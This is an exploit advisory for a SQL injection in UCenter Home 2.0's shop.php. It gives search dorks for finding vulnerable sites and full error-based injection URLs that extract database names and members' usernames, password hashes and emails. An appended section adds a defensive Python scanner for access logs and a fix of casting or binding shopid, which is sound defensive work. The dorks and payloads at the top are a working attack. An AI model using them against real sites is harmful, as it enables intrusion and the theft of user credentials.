__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okay.

You edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
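
For defenders, requests of the kind quoted above leave a recognisable trace in web server access logs. The following is an added example, not part of the original advisory or of UCenter Home: it scans log lines for shop.php?ac=view requests whose shopid is not a plain integer and tags the error-based markers that appear in the strings above. The log lines are constructed, and the rule that legitimate shopid values are decimal integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Tokens that appear in the injection strings quoted in this advisory.
ERROR_BASED_MARKERS = ("information_schema", "floor(rand(", "group by", "concat(0x")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, shortened payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:10:00:00 +0000] '
    '"GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2011:10:00:05 +0000] '
    '"GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),'
    'concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2011:10:00:09 +0000] '
    '"GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
]

def inspect_line(line):
    """Return None for benign lines, else a dict describing the request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
    if params.get("ac", [""])[0] != "view" or "shopid" not in params:
        return None
    shopid = params["shopid"][0]
    if re.fullmatch(r"[0-9]+", shopid):  # assumption: real shop ids are integers
        return None
    lowered = re.sub(r"\s+", " ", shopid.lower())
    markers = [t for t in ERROR_BASED_MARKERS if t in lowered]
    return {"client": line.split(" ", 1)[0], "shopid": shopid,
            "markers": markers, "error_based": len(markers) >= 2}

def scan(lines):
    """Collect findings for every suspicious shop.php?ac=view request."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A non-integer shopid is worth alerting on by itself; on the application side, casting shopid to an integer or binding it as a query parameter removes the injection point.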